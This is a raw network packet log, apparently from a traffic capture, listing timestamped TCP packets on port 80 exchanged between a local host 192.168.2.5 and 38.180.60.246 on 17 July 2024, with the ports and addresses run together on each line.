                                                                            Jul 17, 2024 15:19:57.918181896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918272972 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918282986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918292999 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918303013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918327093 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918361902 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918416023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918432951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918468952 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918529034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918539047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918548107 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918584108 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918606043 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918672085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918683052 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918690920 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918700933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918710947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918730021 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918771982 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918817997 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918832064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918839931 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918870926 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918893099 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918894053 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918905020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918914080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918922901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918932915 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.918946981 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.918988943 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919246912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919281006 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919301987 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919334888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919368029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919388056 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919421911 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919451952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919478893 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919485092 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919518948 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919532061 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919553995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919589996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919609070 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919622898 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919673920 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919737101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919770002 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919802904 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919821978 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919835091 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919867992 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919887066 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919900894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919934034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919951916 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.919966936 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.919998884 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920020103 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920105934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920137882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920160055 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920171022 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920202971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920219898 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920237064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920269966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920289040 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920304060 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920356035 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920439959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920471907 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920523882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920528889 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920559883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920593023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920612097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920624971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920659065 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920676947 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920739889 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920773029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920792103 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920805931 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920839071 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920857906 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.920871019 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920903921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.920922995 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.105942011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.105942011 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.105952978 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.105963945 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.105977058 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106004953 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106458902 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106470108 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106477976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106487036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106497049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106508017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106517076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106518984 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106530905 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106538057 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106540918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106551886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106559038 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106564045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106575012 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106579065 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106585979 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106596947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106600046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106607914 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106617928 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106626034 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106626034 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106630087 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.106674910 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.106703043 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.107817888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107829094 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107837915 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107847929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107858896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107867956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107877970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107878923 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.107888937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107901096 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107901096 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.107911110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107920885 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.107922077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107933044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107944965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107947111 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.107956886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107964039 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.107966900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107978106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.107996941 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.107996941 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108027935 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108170986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108181953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108191013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108201981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108211994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108222961 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108231068 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108233929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108244896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108252048 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108254910 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108266115 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108270884 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108275890 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108287096 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108288050 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108297110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108306885 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108308077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108319044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108329058 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108330011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108341932 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.108345985 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.108370066 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.148883104 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.187036991 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187099934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187131882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187186003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187191010 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.187220097 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187254906 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187259912 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.187289953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187313080 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.187357903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.187431097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196034908 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196069956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196082115 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196126938 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196229935 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196242094 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196258068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196270943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196297884 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196297884 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196501017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196513891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196562052 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196573019 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196584940 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196594954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196605921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196616888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196630001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196630001 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196640968 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.196666002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196666002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.196696997 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197169065 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197181940 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197191954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197206020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197216988 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197230101 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197232962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197244883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197252989 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197256088 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197271109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197295904 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197324991 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197870016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197882891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197892904 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197902918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197912931 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197923899 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197935104 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197938919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197938919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197946072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197958946 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197968006 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197979927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.197982073 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.197993040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198004961 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198016882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198020935 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198020935 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198029041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198045969 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198076010 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198838949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198851109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198860884 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198873997 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198885918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198894978 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198898077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198909044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198919058 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198928118 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198930979 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198942900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198947906 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198952913 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198965073 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198965073 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.198982000 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198993921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.198993921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.199026108 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.199055910 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.199944973 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.199959040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.199969053 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.199980021 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.199990988 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200002909 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200002909 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.200015068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200026989 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200026989 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.200037956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200043917 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.200050116 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200062037 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200073004 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.200073957 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200084925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200095892 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.200098038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200108051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.200129032 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382143021 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382155895 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382175922 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382210970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382221937 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382319927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382353067 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382386923 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382402897 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382421017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382431984 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382455111 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382498980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382725954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382761002 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382793903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382806063 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382829905 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382862091 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382874012 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382895947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382929087 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382941008 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.382961988 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.382994890 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383008957 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.383028984 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383061886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383095026 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383114100 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.383127928 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383138895 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.383162022 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383197069 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383232117 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383241892 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.383280993 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.383508921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383543015 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383577108 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383599997 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.383610964 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.383634090 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.383646011 CEST804970438.180.60.246192.168.2.5
